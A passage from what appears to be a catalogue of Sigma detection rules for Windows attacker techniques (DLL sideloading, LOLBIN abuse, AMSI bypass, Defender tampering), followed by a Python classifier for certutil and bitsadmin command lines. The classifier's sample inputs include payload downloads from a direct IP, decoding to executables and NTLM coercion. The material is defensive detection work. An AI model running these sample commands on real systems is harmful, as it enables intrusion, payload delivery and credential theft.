Potential DLL Sideloading Via JsSchHlpmediumDetects potential DLL sideloading using JUSTSYSTEMS Japanese word processor
Potential DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXEhighDetects potential DLL side loading of "KeyScramblerIE.dll" by "KeyScrambler.exe". Various threat actors and malware have been found side loading a masqueraded "KeyScramblerIE.dll" through "KeyScrambler.exe".
Potential Libvlc.DLL SideloadingmediumDetects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe"
Potential Mfdetours.DLL SideloadingmediumDetects potential DLL sideloading of "mfdetours.dll". While using "mftrace.exe" it can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution.
Unsigned Mfdetours.DLL SideloadinghighDetects DLL sideloading of unsigned "mfdetours.dll". Executing "mftrace.exe" can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution.
Potential DLL Sideloading Of MpSvc.DLLmediumDetects potential DLL sideloading of "MpSvc.dll".
Potential DLL Sideloading Of MsCorSvc.DLLmediumDetects potential DLL sideloading of "mscorsvc.dll".
Potential DLL Sideloading Of Non-Existent DLLs From System FoldershighDetects DLL sideloading of system DLLs that are not present on the system by default (at least not in system directories). Usually this technique is used to achieve UAC bypass or privilege escalation.
Microsoft Office DLL SideloadhighDetects DLL sideloading of DLLs that are part of Microsoft Office from non standard location
Potential Python DLL SideLoadingmediumDetects potential DLL sideloading of Python DLL files.
Potential Rcdll.DLL SideloadinghighDetects potential DLL sideloading of rcdll.dll
Potential RjvPlatform.DLL Sideloading From Default LocationmediumDetects loading of "RjvPlatform.dll" by the "SystemResetPlatform.exe" binary which can be abused as a method of DLL side loading since the "$SysReset" directory isn't created by default.
Potential RjvPlatform.DLL Sideloading From Non-Default LocationhighDetects potential DLL sideloading of "RjvPlatform.dll" by "SystemResetPlatform.exe" located in a non-default location.
Potential RoboForm.DLL SideloadingmediumDetects potential DLL sideloading of "roboform.dll", a DLL used by RoboForm Password Manager
Potential ShellDispatch.DLL SideloadingmediumDetects potential DLL sideloading of "ShellDispatch.dll"
DLL Sideloading Of ShellChromeAPI.DLLhighDetects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary in combination with the "PhoneDeepLink" flag tries to load this DLL. Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter
Potential SmadHook.DLL SideloadinghighDetects potential DLL sideloading of "SmadHook.dll", a DLL used by SmadAV antivirus
Potential SolidPDFCreator.DLL SideloadingmediumDetects potential DLL sideloading of "SolidPDFCreator.dll"
Third Party Software DLL SideloadingmediumDetects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)
Fax Service DLL Search Order HijackhighThe Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.
Potential Vivaldi_elf.DLL SideloadingmediumDetects potential DLL sideloading of "vivaldi_elf.dll"
VMGuestLib DLL SideloadmediumDetects DLL sideloading of VMGuestLib.dll by the WmiApSrv service.
VMMap Signed Dbghelp.DLL Potential SideloadingmediumDetects potential DLL sideloading of a signed dbghelp.dll by the Sysinternals VMMap.
VMMap Unsigned Dbghelp.DLL Potential SideloadinghighDetects potential DLL sideloading of an unsigned dbghelp.dll by the Sysinternals VMMap.
Potential DLL Sideloading Via VMware XferhighDetects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL
Potential Waveedit.DLL SideloadinghighDetects potential DLL sideloading of "waveedit.dll", which is part of the Nero WaveEditor audio editing software.
Potential Wazuh Security Platform DLL SideloadingmediumDetects potential DLL side loading of DLLs that are part of the Wazuh security platform
Potential Mpclient.DLL SideloadinghighDetects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory.
Potential WWlib.DLL SideloadingmediumDetects potential DLL sideloading of "wwlib.dll"
Windows Spooler Service Suspicious Binary LoadinformationalDetect DLL Load from Spooler Service backup folder
DLL Load By System Process From Suspicious LocationsmediumDetects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location or a location with permissive permissions such as "C:\Users\Public"
Python Image Load By Non-Python ProcessmediumDetects the image load of "Python Core" by a non-Python process. This might be indicative of a Python script bundled with Py2Exe.
Unsigned DLL Loaded by Windows UtilitymediumDetects windows utilities loading an unsigned or untrusted DLL. Adversaries often abuse those programs to proxy execution of malicious code.
Suspicious Unsigned Thor Scanner ExecutionhighDetects loading and execution of an unsigned thor scanner binary.
UAC Bypass Using Iscsicpl - ImageLoadhighDetects the "iscsicpl.exe" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%
UAC Bypass With Fake DLLhighAttempts to load dismcore.dll after dropping it
WMIC Loading Scripting LibrariesmediumDetects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc).
Network Connection Initiated By AddinUtil.EXEhighDetects a network connection initiated by the Add-In deployment cache updating utility "AddInutil.exe". This could indicate a potential command and control communication as this tool doesn't usually initiate network activity.
Outbound Network Connection Initiated By Cmstp.EXEhighDetects a network connection initiated by Cmstp.EXE Its uncommon for "cmstp.exe" to initiate an outbound network connection. Investigate the source of such requests to determine if they are malicious.
Network Connection Initiated Via Notepad.EXEhighDetects a network connection that is initiated by the "notepad.exe" process. This might be a sign of process injection from a beacon process or something similar. Notepad rarely initiates a network communication except when printing documents for example.
Office Application Initiated Network Connection Over Uncommon PortsmediumDetects an office suit application (Word, Excel, PowerPoint, Outlook) communicating to target systems over uncommon ports.
RegAsm.EXE Initiating Network Connection To Public IPmediumDetects "RegAsm.exe" initiating a network connection to public IP adresses
Network Connection Initiated By Regsvr32.EXEmediumDetects a network connection initiated by "Regsvr32.exe"
Microsoft Sync Center Suspicious Network ConnectionsmediumDetects suspicious connections from Microsoft Sync Center to non-private IPs.
Rundll32 Internet ConnectionmediumDetects a rundll32 that communicates with public IP addresses
Outbound Network Connection To Public IP Via WinlogonmediumDetects a "winlogon.exe" process that initiate network communications with public IP addresses
CobaltStrike Named PipecriticalDetects the creation of a named pipe as used by CobaltStrike
Suspicious Network Connection Binary No CommandLinehighDetects suspicious network connections made by a well-known Windows binary run with no command line parameters
Suspicious Wordpad Outbound ConnectionsmediumDetects a network connection initiated by "wordpad.exe" over uncommon destination ports. This might indicate potential process injection activity from a beacon or similar mechanisms.
CobaltStrike Named Pipe Pattern RegexcriticalDetects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles
Potentially Suspicious Wuauclt Network ConnectionmediumDetects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making network connections. One could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.
CobaltStrike Named Pipe PatternshighDetects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles
HackTool - CoercedPotato Named Pipe CreationhighDetects the pattern of a pipe name as used by the hack tool CoercedPotato
HackTool - EfsPotato Named Pipe CreationhighDetects the pattern of a pipe name as used by the hack tool EfsPotato
Malicious Named Pipe CreatedcriticalDetects the creation of a named pipe seen used by known APTs or malware.
PowerShell Downgrade Attack - PowerShellmediumDetects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0
PowerShell Called from an Executable Version MismatchhighDetects PowerShell called from an executable by the version mismatch method
Potential RemoteFXvGPUDisablement.EXE AbusehighDetects PowerShell module creation where the module Contents are set to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential abuse of the "RemoteFXvGPUDisablement.exe" binary which is known to be vulnerable to module load-order hijacking.
Tamper Windows Defender - PSClassichighAttempting to disable scheduled scanning and other parts of Windows Defender ATP or set default actions to allow.
Clear PowerShell History - PowerShell ModulemediumDetects keywords that could indicate clearing PowerShell history
PowerShell Decompress CommandsinformationalA General detection for specific decompress commands in PowerShell logs. This could be an adversary decompressing files.
Invoke-Obfuscation CLIP+ Launcher - PowerShell ModulehighDetects Obfuscated use of Clip.exe to execute PowerShell
Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell ModulehighDetects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below
Invoke-Obfuscation STDIN+ Launcher - PowerShell ModulehighDetects Obfuscated use of stdin to execute PowerShell
Invoke-Obfuscation VAR+ Launcher - PowerShell ModulehighDetects Obfuscated use of Environment Variables to execute PowerShell
Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell ModulemediumDetects Obfuscated Powershell via COMPRESS OBFUSCATION
Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell ModulemediumDetects Obfuscated Powershell via RUNDLL LAUNCHER
Invoke-Obfuscation Via Stdin - PowerShell ModulehighDetects Obfuscated Powershell via Stdin in Scripts
Invoke-Obfuscation Via Use MSHTA - PowerShell ModulehighDetects Obfuscated Powershell via use MSHTA in Scripts
Invoke-Obfuscation Via Use Clip - PowerShell ModulehighDetects Obfuscated Powershell via use Clip.exe in Scripts
Invoke-Obfuscation Via Use Rundll32 - PowerShell ModulehighDetects Obfuscated Powershell via use Rundll32 in Scripts
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell ModulehighDetects Obfuscated Powershell via VAR++ LAUNCHER
Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell ModulehighDetects PowerShell module creation where the module Contents are set to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential abuse of the "RemoteFXvGPUDisablement.exe" binary which is known to be vulnerable to module load-order hijacking.
SyncAppvPublishingServer Bypass Powershell Restriction - PS ModulemediumDetects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.
AMSI Bypass Pattern Assembly GetTypehighDetects code fragments found in small and obfuscated AMSI bypass PowerShell scripts
Potential AMSI Bypass Script Using NULL BitsmediumDetects usage of special strings/null bits in order to potentially bypass AMSI functionalities
Clearing Windows Console HistoryhighIdentifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.
Clear PowerShell History - PowerShellmediumDetects keywords that could indicate clearing PowerShell history
Powershell Detect Virtualization EnvironmentmediumAdversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox
Disable Powershell Command HistoryhighDetects scripts or commands that disabled the Powershell command history by removing psreadline module
Disable-WindowsOptionalFeature Command PowerShellhighDetect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool. Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images
Potential In-Memory Execution Using Reflection.AssemblymediumDetects usage of "Reflection.Assembly" load functions to dynamically load assemblies in memory
Potential Suspicious Windows Feature EnabledmediumDetects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" used as a Deployment Image Servicing and Management tool. Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images
Disable of ETW Trace - PowershellhighDetects usage of powershell cmdlets to disable or remove ETW trace sessions
HackTool - WinPwn Execution - ScriptBlockhighDetects scriptblock text keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
Unsigned AppX Installation Attempt Using Add-AppxPackage - PsScriptmediumDetects usage of the "Add-AppxPackage" or it's alias "Add-AppPackage" to install unsigned AppX packages
Invoke-Obfuscation CLIP+ Launcher - PowerShellhighDetects Obfuscated use of Clip.exe to execute PowerShell
Invoke-Obfuscation Obfuscated IEX Invocation - PowerShellhighDetects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \u2014
Invoke-Obfuscation STDIN+ Launcher - PowershellhighDetects Obfuscated use of stdin to execute PowerShell
Invoke-Obfuscation VAR+ Launcher - PowerShellhighDetects Obfuscated use of Environment Variables to execute PowerShell
Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShellmediumDetects Obfuscated Powershell via COMPRESS OBFUSCATION
Invoke-Obfuscation RUNDLL LAUNCHER - PowerShellmediumDetects Obfuscated Powershell via RUNDLL LAUNCHER
Invoke-Obfuscation Via Stdin - PowershellhighDetects Obfuscated Powershell via Stdin in Scripts
Invoke-Obfuscation Via Use Clip - PowershellhighDetects Obfuscated Powershell via use Clip.exe in Scripts
Invoke-Obfuscation Via Use MSHTA - PowerShellhighDetects Obfuscated Powershell via use MSHTA in Scripts
Invoke-Obfuscation Via Use Rundll32 - PowerShellhighDetects Obfuscated Powershell via use Rundll32 in Scripts
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShellhighDetects Obfuscated Powershell via VAR++ LAUNCHER
Modify Group Policy Settings - ScriptBlockLoggingmediumDetect malicious GPO modifications can be used to implement many other malicious behaviors.
NTFS Alternate Data StreamhighDetects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.
Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell ScriptBlockhighDetects PowerShell module creation where the module Contents are set to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential abuse of the "RemoteFXvGPUDisablement.exe" binary which is known to be vulnerable to module load-order hijacking.
Root Certificate Installed - PowerShellmediumAdversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
Suspicious Invoke-Item From Mount-DiskImagemediumAdversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.
PowerShell Script Change Permission Via Set-Acl - PsScriptlowDetects PowerShell scripts set ACL to of a file or a folder
PowerShell Set-Acl On Windows Folder - PsScripthighDetects PowerShell scripts to set the ACL to a file in the Windows folder
PowerShell ShellCodehighDetects Base64 encoded Shellcode
Powershell Store File In Alternate Data StreammediumStoring files in Alternate Data Stream (ADS) similar to Astaroth malware.
Potential Persistence Via Security Descriptors - ScriptBlockhighDetects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project.
Potential PowerShell Obfuscation Using Character JoinlowDetects specific techniques often seen used inside of PowerShell scripts to obfscuate Alias creation
Suspicious Eventlog ClearmediumDetects usage of known powershell cmdlets such as "Clear-EventLog" to clear the Windows event logs
Troubleshooting Pack Cmdlet ExecutionmediumDetects execution of "TroubleshootingPack" cmdlets to leverage CVE-2022-30190 or action similar to "msdt" lolbin (as described in LOLBAS)
Suspicious Hyper-V CmdletsmediumAdversaries may carry out malicious operations using a virtual instance to avoid detection
Suspicious IO.FileStreammediumOpen a handle on the drive volume via the \\.\ DOS device path specifier and perform direct access read of the first few bytes of the volume.
PowerShell Deleted Mounted SharemediumDetects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation
Suspicious Mount-DiskImagelowAdversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.
Suspicious Service DACL Modification Via Set-Service Cmdlet - PShighDetects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7)
Potential PowerShell Obfuscation Using Alias CmdletslowDetects Set-Alias or New-Alias cmdlet usage. Which can be use as a mean to obfuscate PowerShell scripts
Suspicious Start-Process PassThrumediumPowershell use PassThru option to start in background
Suspicious Unblock-FilemediumRemove the Zone.Identifier alternate data stream which identifies the file as downloaded from the internet.
Suspicious PowerShell WindowStyle OptionmediumAdversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden
PowerShell Write-EventLog UsagemediumDetects usage of the "Write-EventLog" cmdlet with 'RawData' flag. The cmdlet can be levreage to write malicious payloads to the EventLog and then retrieve them later for later use
SyncAppvPublishingServer Execution to Bypass Powershell RestrictionmediumDetects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.
Tamper Windows Defender Remove-MpPreference - ScriptBlockLogginghighDetects attempts to remove Windows Defender configuration using the 'MpPreference' cmdlet
Tamper Windows Defender - ScriptBlockLogginghighDetects PowerShell scripts attempting to disable scheduled scanning and other parts of Windows Defender ATP or set default actions to allow.
Powershell TimestompmediumAdversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder.
Powershell Token Obfuscation - PowershellhighDetects TOKEN OBFUSCATION technique from Invoke-Obfuscation
Abuse of Service Permissions to Hide Services Via Set-Service - PShighDetects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7)
Potentially Suspicious Call To Win32_NTEventlogFile Class - PSScriptmediumDetects usage of the WMI class "Win32_NTEventlogFile" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script
PowerShell WMI Win32_Product Install MSImediumDetects the execution of an MSI file using PowerShell and the WMI Win32_Product class
Windows Firewall Profile DisabledmediumDetects when a user disables the Windows Firewall via a Profile to help evade defense.
Windows Defender Exclusions Added - PowerShellmediumDetects modifications to the Windows Defender configuration settings using PowerShell to add exclusions
Suspicious X509Enrollment - Ps ScriptmediumDetect use of X509Enrollment
CMSTP Execution Process AccesshighDetects various indicators of Microsoft Connection Manager Profile Installer execution
HackTool - CobaltStrike BOF Injection PatternhighDetects a typical pattern of a CobaltStrike BOF which inject into other processes
HackTool - HandleKatz Duplicating LSASS HandlehighDetects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles
HackTool - SysmonEnte ExecutionhighDetects the use of SysmonEnte, a tool to attack the integrity of Sysmon
Uncommon Process Access Rights For Target ImagelowDetects process access request to uncommon target images with a "PROCESS_ALL_ACCESS" access mask.
Suspicious Svchost Process AccesshighDetects suspicious access to the "svchost" process such as that used by Invoke-Phantom to kill the thread of the Windows event logging service.
Function Call From Undocumented COM Interface EditionUpgradeManager | medium | Detects function calls from the EditionUpgradeManager COM interface, an interface that is not used by standard executables.
UAC Bypass Using WOW64 Logger DLL Hijack | high | Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)
Suspicious AddinUtil.EXE CommandLine Execution | high | Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with suspicious Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversary's Addins.Store payload.
Uncommon Child Process Of AddinUtil.EXE | medium | Detects uncommon child processes of the Add-In deployment cache updating utility (AddInutil.exe) which could be a sign of potential abuse of the binary to proxy execution via a custom Addins.Store payload.
Uncommon AddinUtil.EXE CommandLine Execution | medium | Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with uncommon Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversary's Addins.Store payload.
AddinUtil.EXE Execution From Uncommon Directory | medium | Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) from a non-standard directory.
Potential Adplus.EXE Abuse | high | Detects execution of "AdPlus.exe", a binary that is part of the Windows SDK that can be used as a LOLBIN in order to dump process memory and execute arbitrary commands.
AgentExecutor PowerShell Execution | medium | Detects execution of the AgentExecutor.exe binary, which can be abused as a LOLBIN to execute PowerShell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by the 6th positional argument
Suspicious AgentExecutor PowerShell Execution | high | Detects execution of the AgentExecutor.exe binary, which can be abused as a LOLBIN to execute PowerShell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by the 6th positional argument
Uncommon Child Process Of Appvlp.EXE | medium | Detects uncommon child processes of Appvlp.EXE. Appvlp, the Application Virtualization Utility, is included with Microsoft Office. Attackers are able to abuse "AppVLP" to execute shell commands. Normally, this binary is used for Application Virtualization, but it can also be abused to circumvent the ASR file path rule folder or to mark a file as a system file.
AspNetCompiler Execution | medium | Detects execution of "aspnet_compiler.exe" which can be abused to compile and execute C# code.
Suspicious Child Process of AspNetCompiler | high | Detects potentially suspicious child processes of "aspnet_compiler.exe".
Potentially Suspicious ASP.NET Compilation Via AspNetCompiler | high | Detects execution of "aspnet_compiler.exe" with potentially suspicious paths for compilation.
Uncommon Assistive Technology Applications Execution Via AtBroker.EXE | medium | Detects the start of a non built-in assistive technology application via "Atbroker.EXE".
Hiding Files with Attrib.exe | medium | Detects usage of attrib.exe to hide files from users.
Set Suspicious Files as System Files Using Attrib.EXE | high | Detects the usage of attrib with the "+s" option to set scripts or executables located in suspicious locations as system files, to hide them from users and make them impossible to delete with simple rights. The rule limits the search to specific extensions and directories to avoid FPs
Audit Policy Tampering Via NT Resource Kit Auditpol | high | Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability. This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.
Audit Policy Tampering Via Auditpol | high | Threat actors can use the auditpol binary to change audit policy configuration to impair detection capability. This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.
Indirect Inline Command Execution Via Bash.EXE | medium | Detects execution of the Microsoft bash launcher with the "-c" flag. This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.
Indirect Command Execution From Script File Via Bash.EXE | medium | Detects execution of the Microsoft bash launcher without any flags to execute the content of a bash script directly. This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.
Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE | medium | Detects potentially malicious and unauthorized usage of bcdedit.exe
Suspicious Child Process Of BgInfo.EXE | high | Detects suspicious child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript
BitLockerTogo.EXE Execution | low | Detects the execution of "BitLockerToGo.EXE". BitLocker To Go is BitLocker Drive Encryption on removable data drives. This feature includes the encryption of USB flash drives, SD cards, external hard disk drives, and other drives that are formatted with the NTFS, FAT16, FAT32, or exFAT file system. This is a rarely used application and any usage of it is worth investigating. Malware such as Lumma stealer has been seen using this process as a target for process hollowing.
Uncommon Child Process Of BgInfo.EXE | medium | Detects uncommon child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript
Suspicious Download From Direct IP Via Bitsadmin | high | Detects usage of bitsadmin downloading a file using a URL that contains an IP
File Download Via Bitsadmin | medium | Detects usage of bitsadmin downloading a file
Suspicious Download From File-Sharing Website Via Bitsadmin | high | Detects usage of bitsadmin downloading a file from a suspicious domain
File With Suspicious Extension Downloaded Via Bitsadmin | high | Detects usage of bitsadmin downloading a file with a suspicious extension
File Download Via Bitsadmin To A Suspicious Target Folder | high | Detects usage of bitsadmin downloading a file to a suspicious target folder
File Download Via Bitsadmin To An Uncommon Target Folder | medium | Detects usage of bitsadmin downloading a file to an uncommon target folder
Monitoring For Persistence Via BITS | medium | BITS allows you to schedule a command to execute after a successful download, to notify you that the job is finished. When the job runs on the system, the command specified in the BITS job is executed. This can be abused by actors to create a backdoor within the system and for persistence: the command is chained into a BITS job that schedules the download of malware/additional binaries and executes the program after it has been downloaded.
Suspicious Calculator Usage | high | Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion.
Potential Binary Proxy Execution Via Cdb.EXE | medium | Detects usage of "cdb.exe" to launch arbitrary processes or commands from a debugger script file
New Root Certificate Installed Via CertMgr.EXE | medium | Detects execution of "certmgr" with the "add" flag in order to install a new certificate on the system. Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
DLL Loaded via CertOC.EXE | medium | Detects when a user installs certificates by using CertOC.exe to load the target DLL file.
Suspicious DLL Loaded via CertOC.EXE | high | Detects when a user installs certificates by using CertOC.exe to load the target DLL file.
New Root Certificate Installed Via Certutil.EXE | medium | Detects execution of "certutil" with the "addstore" flag in order to install a new certificate on the system. Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
File Decoded From Base64/Hex Via Certutil.EXE | medium | Detects the execution of certutil with either the "decode" or "decodehex" flags to decode base64 or hex encoded files. This can be abused by attackers to decode an encoded payload before execution
Suspicious Download Via Certutil.EXE | medium | Detects the execution of certutil with certain flags that allow the utility to download files.
Suspicious File Downloaded From Direct IP Via Certutil.EXE | high | Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.
Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE | high | Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.
File Encoded To Base64 Via Certutil.EXE | medium | Detects the execution of certutil with the "encode" flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration
Potential NTLM Coercion Via Certutil.EXE | high | Detects possible NTLM coercion via certutil using the 'syncwithWU' flag
Suspicious File Encoded To Base64 Via Certutil.EXE | high | Detects the execution of certutil with the "encode" flag to encode a file to base64 where the extension of the file is suspicious
File In Suspicious Location Encoded To Base64 Via Certutil.EXE | high | Detects the execution of certutil with the "encode" flag to encode a file to base64 where the file is located in a potentially suspicious location
Certificate Exported Via Certutil.EXE | medium | Detects the execution of certutil with the "exportPFX" flag which allows the utility to export certificates.
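The bitsadmin rows and the certutil rows above are all flag-plus-argument checks on a process-creation command line, split by level according to where the file comes from and where it lands. The following is an added example for this report, not the Sigma rules themselves: a classifier that runs those checks over constructed command lines and returns the row title and level each one would trigger. The file-sharing domain list, the suspicious folders and extensions, and the sample command lines are this example's own assumptions, chosen to exercise each branch; a production rule set would carry its own lists.

```python
"""Classify certutil.exe and bitsadmin.exe command lines into the categories the
rules above describe. Added example; the indicator lists and sample command
lines are constructed for illustration, not taken from the Sigma rules."""
import re

DIRECT_IP_URL = re.compile(r"https?://(?:\d{1,3}\.){3}\d{1,3}", re.I)
URL = re.compile(r"https?://\S+", re.I)
FILE_SHARING_DOMAINS = ("pastebin.com", "transfer.sh", "anonfiles.com", "mega.nz")  # assumption
SUSPICIOUS_FOLDERS = ("\\users\\public\\", "\\appdata\\", "\\temp\\", "\\programdata\\", "\\perflogs\\")
SUSPICIOUS_EXTENSIONS = (".exe", ".dll", ".ps1", ".hta", ".vbs", ".bat", ".scr")
LEVELS = {"informational": 0, "low": 1, "medium": 2, "high": 3, "critical": 4}


def _tokens(cmd: str) -> list[str]:
    """Split a Windows command line, keeping quoted arguments intact and unquoted."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmd)]


def _flags(tokens: list[str]) -> set[str]:
    # certutil accepts both -flag and /flag; bitsadmin uses /flag.
    return {t.lstrip("-/").lower() for t in tokens[1:] if t[:1] in ("-", "/")}


def _paths(tokens: list[str]) -> list[str]:
    return [t for t in tokens[1:] if t[:1] not in ("-", "/") and "://" not in t]


def classify(cmd: str) -> list[tuple[str, str]]:
    """Return [(rule title, level), ...] for one process-creation command line."""
    tokens = _tokens(cmd)
    if not tokens:
        return []
    image = tokens[0].rsplit("\\", 1)[-1].lower()
    flags, paths, urls = _flags(tokens), _paths(tokens), URL.findall(cmd)
    hits: list[tuple[str, str]] = []
    add = lambda title, level: hits.append((title, level))
    from_ip = any(DIRECT_IP_URL.match(u) for u in urls)
    from_sharing = any(d in u.lower() for u in urls for d in FILE_SHARING_DOMAINS)

    if image in ("certutil.exe", "certutil"):
        if "addstore" in flags:
            add("New Root Certificate Installed Via Certutil.EXE", "medium")
        if flags & {"decode", "decodehex"}:
            add("File Decoded From Base64/Hex Via Certutil.EXE", "medium")
        if flags & {"urlcache", "verifyctl"} and urls:
            add("Suspicious Download Via Certutil.EXE", "medium")
            if from_ip:
                add("Suspicious File Downloaded From Direct IP Via Certutil.EXE", "high")
            if from_sharing:
                add("Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE", "high")
        if "encode" in flags and paths:
            infile = paths[0].lower()          # certutil -encode <infile> <outfile>
            add("File Encoded To Base64 Via Certutil.EXE", "medium")
            if infile.endswith(SUSPICIOUS_EXTENSIONS):
                add("Suspicious File Encoded To Base64 Via Certutil.EXE", "high")
            if any(f in infile for f in SUSPICIOUS_FOLDERS):
                add("File In Suspicious Location Encoded To Base64 Via Certutil.EXE", "high")
        if "exportpfx" in flags:
            add("Certificate Exported Via Certutil.EXE", "medium")
        if "syncwithwu" in flags and any(p.startswith("\\\\") for p in paths):
            add("Potential NTLM Coercion Via Certutil.EXE", "high")   # UNC target forces auth

    elif image in ("bitsadmin.exe", "bitsadmin"):
        if flags & {"transfer", "addfile"} and urls:
            target = paths[-1].lower() if paths else ""   # local destination is the last path
            add("File Download Via Bitsadmin", "medium")
            if from_ip:
                add("Suspicious Download From Direct IP Via Bitsadmin", "high")
            if from_sharing:
                add("Suspicious Download From File-Sharing Website Via Bitsadmin", "high")
            if target.endswith(SUSPICIOUS_EXTENSIONS):
                add("File With Suspicious Extension Downloaded Via Bitsadmin", "high")
            if any(f in target for f in SUSPICIOUS_FOLDERS):
                add("File Download Via Bitsadmin To A Suspicious Target Folder", "high")
        if "setnotifycmdline" in flags:
            add("Monitoring For Persistence Via BITS", "medium")
    return hits


def highest_level(hits: list[tuple[str, str]]):
    """Return the most severe level among the hits, or None when there are none."""
    return max((lvl for _, lvl in hits), key=LEVELS.__getitem__, default=None)


SAMPLE_COMMAND_LINES = [  # constructed; 203.0.113.0/24 is a documentation range
    r"certutil.exe -urlcache -split -f http://203.0.113.10/a.txt C:\Users\Public\a.txt",
    r"certutil -decode C:\Users\Public\a.txt C:\Users\Public\a.exe",
    r"certutil -encode C:\Users\bob\AppData\Local\Temp\creds.dll C:\Users\bob\out.txt",
    r"bitsadmin /transfer job /download /priority high https://pastebin.com/raw/abcd C:\Users\Public\update.exe",
    r"certutil -syncwithWU \\203.0.113.10\share",
    r"certutil -addstore Root C:\Users\Public\ca.cer",
    r"bitsadmin /SetNotifyCmdLine job C:\Users\Public\run.exe NULL",
    r"certutil -hashfile C:\Windows\System32\ntdll.dll SHA256",
]

if __name__ == "__main__":
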